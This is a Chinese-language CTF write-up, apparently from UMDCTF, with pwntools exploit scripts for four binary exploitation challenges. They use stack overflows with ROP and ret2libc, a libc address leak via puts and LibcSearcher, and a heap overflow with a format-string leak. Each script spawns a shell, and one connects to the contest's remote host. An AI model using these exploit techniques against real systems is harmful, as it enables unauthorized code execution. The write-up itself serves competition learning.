6道pwn题,4道可以做。剩下一道题是arm架构,一道题是内核,溜了溜了。
Jump_Not_Easy
1 from pwn import * 2 3 p = process('./pwn') 4 elf = ELF('./pwn') 5 context.log_level = 'debug' 6 7 def duan(): 8 gdb.attach(p) 9 pause() 10 11 payload = 'a'*0x40+'bbbbbbbb'+p64(0x040125D) 12 p.sendlineafter('go? ',payload) 13 p.recv()
Jump_Is_Easy
system怎么也打不通,加了个ret才打通,估计又是栈对齐的问题(猜的)。
1 from pwn import * 2 from LibcSearcher import * 3 4 p = process('./pwn') 5 elf = ELF('./pwn') 6 context.log_level = 'debug' 7 8 def duan(): 9 gdb.attach(p) 10 pause() 11 12 pop_rdi = 0x004012c3 13 ret = 0x0040101a 14 fun_got = elf.got['__libc_start_main'] 15 puts_plt = elf.plt['puts'] 16 main = elf.symbols['main'] 17 18 payload = 'a'*0x40+'bbbbbbbb' 19 payload+= p64(pop_rdi)+p64(fun_got) 20 payload+= p64(puts_plt)+p64(main) 21 22 p.sendlineafter('go? ',payload) 23 fun_addr = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) 24 libc = LibcSearcher("__libc_start_main", fun_addr) 25 libc_base = fun_addr-libc.dump("__libc_start_main") 26 system = libc_base+libc.dump("system") 27 binsh = libc_base+libc.dump("str_bin_sh") 28 print 'system-->'+hex(system) 29 print 'binsh-->'+hex(binsh) 30 print 'libc_base-->'+hex(libc_base) 31 32 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system) 33 p.sendlineafter('go? ',payload) 34 p.interactive()
Jump_Not_Working
感觉和上一题一样...
1 from pwn import * 2 from LibcSearcher import * 3 4 p = process('./pwn') 5 p = remote('chals5.umdctf.io',7004) 6 elf = ELF('./pwn') 7 context.log_level = 'debug' 8 9 def duan(): 10 gdb.attach(p) 11 pause() 12 13 pop_rdi = 0x004012c3 14 ret = 0x0040101a 15 fun_got = elf.got['__libc_start_main'] 16 puts_plt = elf.plt['puts'] 17 main = elf.symbols['main'] 18 19 payload = 'a'*0x40+'bbbbbbbb' 20 payload+= p64(pop_rdi)+p64(fun_got) 21 payload+= p64(puts_plt)+p64(main) 22 23 p.sendlineafter('go? ',payload) 24 fun_addr = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) 25 libc = LibcSearcher("__libc_start_main", fun_addr) 26 libc_base = fun_addr-libc.dump("__libc_start_main") 27 system = libc_base+libc.dump("system") 28 binsh = libc_base+libc.dump("str_bin_sh") 29 print 'system-->'+hex(system) 30 print 'binsh-->'+hex(binsh) 31 print 'libc_base-->'+hex(libc_base) 32 33 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system) 34 p.sendlineafter('go? ',payload) 35 p.interactive()
Jump_Is_Found
堆溢出+格式化字符串漏洞,不知道为什么打不了got表。仔细分析代码就可以出。
1 from pwn import * 2 from LibcSearcher import * 3 4 p = process('./pwn') 5 elf = ELF('./pwn') 6 context(os='linux',arch='amd64',log_level='debug') 7 8 def duan(): 9 gdb.attach(p) 10 pause() 11 12 payload = 'a'*0x100+p64(0)+p64(0x111)+'%51$p' 13 p.sendlineafter('CONSOLE> ',payload) 14 p.recvuntil('location: ') 15 fun_got = int(p.recv(14),16)-231 16 17 libc = LibcSearcher("__libc_start_main",fun_got) 18 libc_base = fun_got-libc.dump("__libc_start_main") 19 system = libc_base+libc.dump("system") 20 binsh = libc_base+libc.dump("str_bin_sh") 21 print 'libc_base-->'+hex(libc_base) 22 print 'system-->'+hex(system) 23 24 payload = '1'.ljust(0x100,'a')+p64(0)+p64(0x111)+'/bin/shx00'.ljust(0x100,'a')+p64(0)+p64(0x21)+p64(system)*3 25 p.sendlineafter('CONSOLE> ',payload) 26 p.interactive()
总结
第一次做国外的比赛,感觉还算友好。
